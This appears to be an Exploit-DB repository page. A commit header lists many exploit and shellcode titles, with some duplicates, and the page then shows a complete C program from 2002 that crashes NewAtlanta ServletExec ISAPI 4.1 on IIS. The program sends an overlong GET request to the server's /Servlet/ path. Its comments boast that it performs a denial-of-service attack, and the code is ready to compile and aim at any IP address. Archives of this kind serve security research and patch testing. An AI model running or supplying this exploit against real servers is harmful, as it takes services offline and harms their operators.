880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
93 lines
No EOL
3.2 KiB
C
93 lines
No EOL
3.2 KiB
C
// source: https://www.securityfocus.com/bid/4796/info
|
|
|
|
ServletExec/ISAPI is a plug-in Java Servlet/JSP engine for Microsoft IIS. It runs with IIS on Microsoft Windows NT/2000/XP systems.
|
|
|
|
A denial of service condition occurs when the JSPServlet is sent an overly long request either directly or via a request for a JSP file.
|
|
|
|
It has been reported that this will cause the underlying webserver to crash.
|
|
|
|
This condition may be the result of insufficient bounds checking, though this possibility has not been confirmed.
|
|
|
|
#include <stdio.h>
|
|
#include <sys/types.h>
|
|
#include <string.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
#include <arpa/inet.h>
|
|
#include <stdlib.h>
|
|
|
|
/* This is Exploit code for a vulnerability in NewAtlanta ServletExec ISAPI 4.1.
|
|
ServletExec 4.1 ISAPI is a Java Servlet/JSP Engine for Internet Information
|
|
Server and is implemented as an ISAPI filter.
|
|
Machines running this program is MS IIS server 4 and 5.
|
|
This code can simple crash the server, successfully preform a DoS attack!
|
|
It sends a string that servletExec don't like but have to eat, and
|
|
this will make the server crash, BIG TIME =)
|
|
This file assuming the www server is on port 80 and that the servlet engine
|
|
is located in the /Servlet directory.
|
|
Jonas "bl0wfi5h" Nyberg and Digital-Root.com is proud to present ServletExecCrash.
|
|
You can contact me at: bl0wfi5h@digital-root.com or bl0wfi5h@hotmail.com.
|
|
This was finished: 2002-05-24 @21:49 Swedish time
|
|
*/
|
|
|
|
void banner(void);
|
|
|
|
typedef unsigned short int USHORT;
|
|
typedef unsigned long int ULONG;
|
|
|
|
|
|
|
|
int main(int argc, char** argv[])
|
|
{
|
|
int sockfd;
|
|
struct sockaddr_in dest_addr;
|
|
|
|
|
|
int len, bytes_sent, select;
|
|
char* string = "GET /Servlet/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.jsp";
|
|
|
|
if(argc < 2 || argc > 2)
|
|
{
|
|
printf("Usage: ./servletExecCrash ip\n");
|
|
printf("Assuming that its port 80, which is default for most www servers\n");
|
|
printf("If this is a case where this is not true, change the got damn source yourself!\n");
|
|
exit(1);
|
|
}
|
|
dest_addr.sin_family = AF_INET;
|
|
dest_addr.sin_port = htons(80);
|
|
inet_aton(argv[1], &(dest_addr.sin_addr));
|
|
memset(&(dest_addr.sin_zero), '\0',8);
|
|
len = strlen(string);
|
|
|
|
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1 )
|
|
{
|
|
printf("problem with your socket!");
|
|
exit(1);
|
|
}
|
|
|
|
connect(sockfd, (struct sockaddr *)& dest_addr, sizeof(struct sockaddr));
|
|
|
|
|
|
bytes_sent = send(sockfd, string, len, 0);
|
|
if(bytes_sent == -1)
|
|
{
|
|
printf("\nYou are having problem sending, the information\n");
|
|
exit(1);
|
|
}
|
|
printf("\nYou have sent: %d", bytes_sent);
|
|
printf(" bytes to: %s", argv[1]);
|
|
close(sockfd);
|
|
banner();
|
|
return 0;
|
|
|
|
}
|
|
void banner(void)
|
|
{
|
|
printf("\n\n***********************************************\n");
|
|
printf("*****CODE MADE BY: JONAS [BL0wFi5h] NYBERG*******\n");
|
|
printf("*********DIGITAL-ROOT PROUDLY PRESENT*************\n");
|
|
printf("****************SERVLETEXECCRASH******************\n");
|
|
printf("**************************************************\n");
|
|
|
|
|
|
} |